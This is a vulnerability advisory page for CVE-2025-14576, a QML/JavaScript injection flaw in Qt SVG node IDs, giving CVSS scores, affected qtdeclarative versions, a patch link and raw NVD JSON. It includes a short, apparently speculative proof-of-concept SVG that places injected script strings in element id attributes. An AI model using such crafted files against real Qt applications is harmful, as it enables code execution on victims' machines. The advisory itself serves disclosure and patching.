Security Vulnerability Report
CVE-2025-14576 CVSS 7.8 HIGH

Published: 2026-04-30 13:16:03
Last Modified: 2026-05-05 02:57:06
Source: a59d8014-47c4-4630-ab43-e1b13cbe58e3

Description

Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qt:qtdeclarative:*:*:*:*:*:*:*:* (versions from 6.8.0 up to, but not including, 6.8.6) - VULNERABLE
cpe:2.3:a:qt:qtdeclarative:*:*:*:*:*:*:*:* (versions from 6.10.0 up to, but not including, 6.10.1) - VULNERABLE
Patch: codereview.qt-project.org/c/qt/qtdeclarative/+/697273

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- PoC for CVE-2025-14576: Qt SVG Node ID Injection -->
<!-- Create a malicious SVG file containing QML/JS injection in the ID attribute -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <!-- Example 1: Attempting to inject JavaScript execution -->
  <!-- Depending on the vulnerability context, the parser might execute the script in the ID -->
  <rect id="javascript:alert('CVE-2025-14576_PoC')" x="0" y="0" width="50" height="50" fill="red"/>
  <!-- Example 2: Attempting to inject QML property binding or method -->
  <circle id="Qt.quit()" cx="75" cy="75" r="25" fill="blue"/>
</svg>
<!-- Usage: Load this file using a vulnerable Qt Quick VectorImage component -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14576", "sourceIdentifier": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "published": "2026-04-30T13:16:02.850", "lastModified": "2026-05-05T02:57:05.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access."}], "metrics": {"cvssMetricV40": [{"source": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qt:qtdeclarative:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.8.0", "versionEndExcluding": "6.8.6", "matchCriteriaId": "06BB3954-EACC-4FD9-B24D-88CBC2043FC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:qt:qtdeclarative:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.10.0", "versionEndExcluding": "6.10.1", "matchCriteriaId": "68D670C7-EF6F-468E-AD32-31F9169A8A20"}]}]}], "references": [{"url": "https://codereview.qt-project.org/c/qt/qtdeclarative/+/697273", "source": "a59d8014-47c4-4630-ab43-e1b13cbe58e3", "tags": ["Patch"]}]}}